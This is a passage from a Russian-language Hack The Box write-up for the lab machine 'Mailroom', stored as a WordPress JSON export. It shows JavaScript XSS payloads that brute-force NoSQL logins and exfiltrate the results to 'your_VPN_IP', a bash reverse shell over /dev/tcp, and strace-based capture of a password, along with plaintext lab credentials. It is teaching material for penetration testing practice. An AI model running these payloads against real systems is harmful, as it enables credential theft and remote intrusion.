\nasync function callAuth(mail) {\n    var content = await fetch("http:\/\/staff-review-panel.mailroom.htb\/auth.php", {\n        "headers": {\n            "content-type": "application\/x-www-form-urlencoded"\n        },\n        "body": "email[$regex]=.*" + mail + "@mailroom.htb&password[$ne]=abc",\n        "method": "POST"\n    }).then(function (res) {\n        return res.text();\n    });\n    return { d: mail, c: \/"success":true\/.test(content) }\n}\nfunction notify(pass) {\n    fetch("http:\/\/your_VPN_IP\/out?"+pass, {});\n}\nvar chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\\"#$%'()+, -\/:;<=>@[\\]_`{}~";\nfunction cal(chars, mail) {\n    for (var i = 0; i < chars.length; i++) {\n        callAuth(chars[i]+mail).then(function (item) {\n            if (item.c) {\n                notify(item.d);\n                cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\\"#$%'()+, -\/:;<=>@[\\]_`{}~", item.d);\n            }\n        });\n    }\n}\ncal(chars, "");\n<\/pre><\/div>\n\n\n
\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043d\u0435\u0433\u043e \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f tristan<\/code><\/p>\n\n\n\n
\u0410\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u044f \u0447\u0435\u0440\u0435\u0437 NoSQL \u0441\u043e\u0437\u0434\u0430\u0451\u043c JS \u0438 \u043f\u043e\u0434\u043d\u0438\u043c\u0430\u0435\u043c SimpleHTTP \u0441\u0435\u0440\u0432\u0435\u0440:<\/p>\n\n\n
\nasync function callAuth(pass){\n  var http = new XMLHttpRequest();\n  http.open('POST', "http:\/\/staff-review-panel.mailroom.htb\/auth.php", true);\n  http.setRequestHeader('Content-type', 'application\/x-www-form-urlencoded');\n  http.onload = function() {\n    if (\/"success":true\/.test(this.responseText)){\n      notify(pass);\n      cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\\"#$%'()+, -\/:;<=>@[\\]_`{}~")\n    }\n  };\n  http.send("email=tristan@mailroom.htb&password[$regex]=^" + pass);\n}\n\nfunction notify(pass) {\n  fetch("http:\/\/your_VPN_IP\/out?" + pass);\n}\nvar chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\\"#$%'()+, -\/:;<=>@[\\]_`{}~"\nfunction cal(chars, pass){\n  for (var i = 0; i < chars.length; i++) {\n    callAuth(pass + chars[i])\n  }\n}\ncal(chars, "");\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043f\u0430\u0440\u043e\u043b\u044c: 69trisRulez!<\/code><\/p>\n\n\n\n
\u0418\u0442\u043e\u0433\u043e\u0432\u044b\u0435 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u0434\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f: tristan:69trisRulez!<\/code><\/p>\n\n\n\n
\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c, \u043f\u043e\u0434\u0445\u043e\u0434\u044f\u0442 \u043b\u0438 \u044d\u0442\u0438 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f ssh:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u041c\u044b \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043d\u043e \u0444\u043b\u0430\u0433 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f – matthew<\/code>, \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043d\u0430 \u0447\u0442\u0435\u043d\u0438\u0435 \u0435\u0433\u043e \u0444\u0430\u0439\u043b\u043e\u0432 \u0443 \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f – \u043d\u0435\u0442.<\/p>\n\n\n\n
\u0422\u0430\u043a\u0436\u0435, \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u043a\u043e\u0434 2FA, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0441\u0445\u043e\u0434\u044f \u0438\u0437 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u0432 \u043a\u043e\u043d\u0441\u043e\u043b\u0438 \u0431\u044b\u043b \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d \u043d\u0430\u043c \u0432 \/var\/mail\/tristan<\/code><\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0412 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u0443 \u0441\u0441\u044b\u043b\u043a\u0443 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u043e\u0439 \u043f\u0430\u043d\u0435\u043b\u0438.<\/p>\n\n\n\n
Port-forwarding \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043f\u0430\u043d\u0435\u043b\u0438: ssh -L 8008:127.0.0.1:80 tristan@mailroom.htb<\/code><\/p>\n\n\n\n
\u041f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u0442\u0430\u043a\u0436\u0435 \u043d\u0435 \u0437\u0430\u0431\u044b\u0432\u0430\u0435\u043c \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c staff-review-panel.mailroom.htb<\/code> \u0432 \u0444\u0430\u0439\u043b hosts \u2192 127.0.0.1<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0413\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0435 \u0434\u0432\u0438\u0436\u0435\u043d\u0438\u0435<\/h3>\n\n\n\n
\u0420\u0430\u043d\u0435\u0435, \u043f\u0440\u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0435 \u043a\u043e\u0434\u0430 \u0432 Gitea \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 inquiry_id<\/code>, \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043c \u043a \u044d\u0442\u043e\u0439 \u0447\u0430\u0441\u0442\u0438. \u041f\u043e\u0434\u043d\u0438\u043c\u0435\u043c SimpleHTTP \u0441\u0435\u0440\u0432\u0435\u0440, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\u044c \u043a\u043e\u0434 \u0441 \u0440\u0435\u0432\u0435\u0440\u0441 \u0448\u0435\u043b\u043b\u043e\u043c:<\/p>\n\n\n
\n#!\/bin\/bash \nbash -i >& \/dev\/tcp\/your_VPN_IP\/7331 0>&1\n<\/pre><\/div>\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0422\u0430\u043a\u0436\u0435, \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0440\u0435\u0432\u0435\u0440\u0441 \u0448\u0435\u043b\u043b\u0430 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0440\u043e\u043f\u0438\u0441\u0430\u0442\u044c \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435: chmod +x \/tmp\/rs<\/code><\/p>\n\n\n\n
\u0414\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0440\u0435\u0432\u0435\u0440\u0441 \u0448\u0435\u043b\u043b\u0430: nc -nvlp 7331<\/code><\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u0432 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e grep<\/code> \u0438\u0449\u0435\u043c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f matthew<\/code>:<\/p>\n\n\n
\nhttp:\/\/matthew:HueLover83%23@gitea:3000\/matthew\/staffroom.git\n<\/pre><\/div>\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f matthew, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u043d \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 \u0434\u043b\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043a \u0441\u0435\u0440\u0432\u0438\u0441\u0443 gitea \u043d\u0430 3000 \u043f\u043e\u0440\u0442\u0435: matthew:HueLover83#<\/code><\/p>\n\n\n\n
\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u044d\u0442\u043e\u0442 \u043f\u0430\u0440\u043e\u043b\u044c \u0434\u043b\u044f \u0441\u043c\u0435\u043d\u044b \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043d\u0430 matthew: su matthew<\/code><\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f!<\/p>\n\n\n\n
\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u0434\u043e root<\/h3>\n\n\n\n
\u0412 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f matthew<\/code> \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0444\u0430\u0439\u043b personal.kbdx<\/code><\/p>\n\n\n\n
\u042d\u0442\u043e \u0431\u0430\u0437\u0430 \u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u044b \u043c\u0435\u043d\u0435\u0434\u0436\u043c\u0435\u043d\u0442\u0430 \u043f\u0430\u0440\u043e\u043b\u044f\u043c\u0438 Keepass<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0424\u0430\u0439\u043b \u0432\u0435\u0440\u0441\u0438\u0438 2.X. \u041f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u0438 \u0440\u0430\u0431\u043e\u0447\u0438\u0435 CVE \u043d\u0430 \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u0443 \u0437\u0430\u0432\u044f\u0437\u0430\u043d\u044b \u043d\u0430 \u0434\u0430\u043c\u043f\u0430\u0445 \u043f\u0430\u043c\u044f\u0442\u0438 \u0438\/\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445, \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0434\u043b\u044f \u041e\u0421 Windows<\/p>\n\n\n\n
\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b strace<\/code> \u043c\u043e\u0436\u043d\u043e \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u0432\u044b\u0437\u043e\u0432\u044b, \u0441\u0430\u043c\u043e\u0435 \u0432\u0430\u0436\u043d\u043e\u0435 \u0434\u043b\u044f \u043d\u0430\u0441 \u0442\u043e, \u0447\u0442\u043e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043d\u0435\u0451 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u0442\u044c \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442 \u0438 \u0447\u0442\u0435\u043d\u0438\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0445 \u0432\u044b\u0437\u043e\u0432\u043e\u0432 \u043c\u0435\u0436\u0434\u0443 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430\u043c\u0438 \u0438 \u044f\u0434\u0440\u043e\u043c \u041e\u0421.<\/p>\n\n\n
\nstrace -p `ps -elf | grep -v 'pts' | awk '\/kpcli\/{print $4}'`\n<\/pre><\/div>\n\n\n
\u041f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u043c \u0432\u044b\u0432\u043e\u0434, \u043d\u0430\u0441 \u0431\u0443\u0434\u0443\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u0442\u044c \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u0447\u0442\u0435\u043d\u0438\u044f:<\/p>\n\n\n
\nread(0, "!", 8192)                      = 1  \n[...] \nread(0, "s", 8192)                      = 1 \n[...] \nread(0, "E", 8192)                      = 1 \n[...] \nread(0, "c", 8192)                      = 1 \n[...] \nread(0, "U", 8192)                      = 1 \n[...] \nread(0, "r", 8192)                      = 1 \n[...] \nread(0, "3", 8192)                      = 1 \n[...] \nread(0, "p", 8192)                      = 1 \n[...] \nread(0, "4", 8192)                      = 1 \n[...] \nread(0, "$", 8192)                      = 1 \n[..] \nread(0, "$", 8192)                      = 1 \n[...] \nread(0, "w", 8192)                      = 1 \n[...] \nread(0, "0", 8192)                      = 1 \n[...]\nread(0, "1", 8192)                      = 1\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c, \u0447\u0442\u043e \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0431\u044b\u043b \u0432\u0432\u0435\u0434\u0451\u043d \u043f\u0430\u0440\u043e\u043b\u044c: !sEcUr3p4$$w01<\/code><\/p>\n\n\n\n
\u0415\u0441\u043b\u0438 \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043b\u0435\u0435, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u0432\u0432\u043e\u0434\u0438\u0442\u0441\u044f \u0441\u0438\u043c\u0432\u043e\u043b \/10, \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0439 Backspace (ASCII code 8)<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041f\u043e\u0441\u043b\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u044f \u0446\u0438\u0444\u0440\u044b 1 \u0432 \u043f\u0430\u0440\u043e\u043b\u0435 \u0432\u043e\u0434\u044f\u0442\u0441\u044f \u0435\u0449\u0451 3 \u0441\u0438\u043c\u0432\u043e\u043b\u0430:<\/p>\n\n\n
\nread(0, "r", 8192)                      = 1 \n[...] \nread(0, "d", 8192)                      = 1 \n[...] \nread(0, "9", 8192)                      = 1\n<\/pre><\/div>\n\n\n
\u0418\u0442\u043e\u0433\u043e\u0432\u044b\u0439 \u043f\u0430\u0440\u043e\u043b\u044c: !sEcUr3p4$$w0rd9<\/code><\/p>\n\n\n\n
\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0432\u0435\u0440\u043d\u043e\u0441\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u0430\u0440\u043e\u043b\u044f:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0423\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043f\u0430\u0440\u043e\u043b\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root, \u0430 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u043d\u0438\u043c \u0438 \u0444\u043b\u0430\u0433:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u0421\u0441\u044b\u043b\u043a\u0438:<\/h3>\n\n\n\n
https:\/\/book.hacktricks.xyz\/pentesting-web\/nosql-injection<\/a> <\/p>\n\n\n\n
https:\/\/jtprog.ru\/strace\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c: Hard \u041e\u0421: Linux \u0411\u0430\u043b\u043b\u044b: 40 IP: 10.10.11.209 \u0422\u0435\u0433\u0438 Code Review, XSS, NoSQL, System call interception \u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0438\u043c\u0435\u043d\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e XSS \u0432 \u0444\u043e\u0440\u043c\u0435 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438 \u0438 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 NoSQL \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f tristan. \u0417\u0430\u0442\u0435\u043c \u0447\u0435\u0440\u0435\u0437 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0443\u044e \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u043c […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[4,5],"class_list":["post-146","post","type-post","status-publish","format-standard","hentry","category-blog","tag-htb","tag-writeup"],"translation":{"provider":"WPGlobus","version":"3.0.0","language":"en","enabled_languages":["ru","en"],"languages":{"ru":{"title":true,"content":true,"excerpt":false},"en":{"title":false,"content":false,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/146","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/comments?post=146"}],"version-history":[{"count":212,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/146\/revisions"}],"predecessor-version":[{"id":536,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/146\/revisions\/536"}],"wp:attachment":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/media?parent=146"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/categories?post=146"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/tags?post=146"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}